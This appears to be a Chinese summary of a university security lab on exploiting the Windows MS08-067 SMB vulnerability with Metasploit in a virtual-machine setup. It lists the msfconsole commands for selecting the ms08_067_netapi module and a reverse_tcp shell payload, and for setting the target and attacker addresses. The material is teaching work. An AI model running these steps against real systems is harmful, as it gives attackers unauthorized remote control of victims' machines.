计算机系统安全-实验二-metasploit.doc

【知识点详解】 本实验主要涉及计算机系统安全领域，特别是针对操作系统的渗透测试技术，使用了Metasploit框架来模拟攻击过程。实验的核心是了解和利用MS08-067漏洞，这是一种存在于Windows操作系统中的远程溢出漏洞，严重影响了系统的安全性。 1. **MS08-067漏洞**： - **漏洞描述**：该漏洞源于Windows系统RPC（Remote Procedure Call）服务的缺陷，当Server服务处理特定的RPC请求时，可能导致缓冲区溢出。攻击者可以通过发送恶意的RPC请求，触发溢出，从而在受影响的系统上执行任意代码，获得SYSTEM权限，对系统造成全面控制。 - **影响范围**：影响广泛，包括Windows XP、2000、Vista、2003等，尤其是Windows 2000、XP和Server 2003系统，攻击者无需认证即可运行任意代码。 - **漏洞端口**：攻击通常通过445端口进行，这是SMB（Server Message Block）服务使用的端口，用于文件共享和网络打印等操作。 - **潜在风险**：此漏洞易于被蠕虫利用，攻击者可制作蠕虫进行大规模攻击，对系统稳定性构成严重威胁。 2. **Metasploit框架**： - **Metasploit控制台**：实验中首先启动的是msfconsole，这是Metasploit的命令行界面，用于交互式地管理渗透测试活动。 - **搜索模块**：通过`search ms08-067`命令寻找与MS08-067漏洞相关的攻击模块，这些模块通常包含了针对特定漏洞的利用代码。 - **选择模块**：`use windows/smb/ms08_067_netapi`，选定用于攻击的模块。 - **选择Payload**：Payload是攻击的真正目标，如`windows/shell/reverse_tcp`，它会在目标系统上创建一个反向Shell，使得攻击者可以从远程控制受害机器。 - **设置参数**：调整模块和Payload的参数，例如`set payload windows/shell/reverse_tcp`，`set RHOST 目标IP`，`set LHOST 攻击机IP`，`set LPORT 反向连接端口`等，确保攻击的有效性和隐蔽性。 3. **实验环境**： - **实验环境**：使用虚拟化软件VMware，部署了WinXP（无SP或SP1）作为被渗透机，Backtrack 4或5作为渗透测试机。虚拟机网络配置为NAT，确保能够进行网络通信。 - **IP地址**：实验前需记录两台虚拟机的IP地址，以便进行网络通信。 4. **实验步骤**： - 启动虚拟机，配置好IP地址和网络连接。 - 在Metasploit控制台中，搜索并选择合适的MS08-067模块。 - 选择合适的Payload，如windows/shell/reverse_tcp，以创建反向Shell。 - 设置必要的参数，包括RHOST（目标IP）、LHOST（攻击机IP）和LPORT（反向连接端口）。 - 执行攻击，监控结果，分析渗透测试的效果。 通过这个实验，学生可以深入理解操作系统安全的脆弱性，学习如何利用工具进行安全评估，并熟悉网络安全防御的基本概念。同时，实验强调了对最新安全漏洞知识的持续学习，以应对不断演变的网络威胁。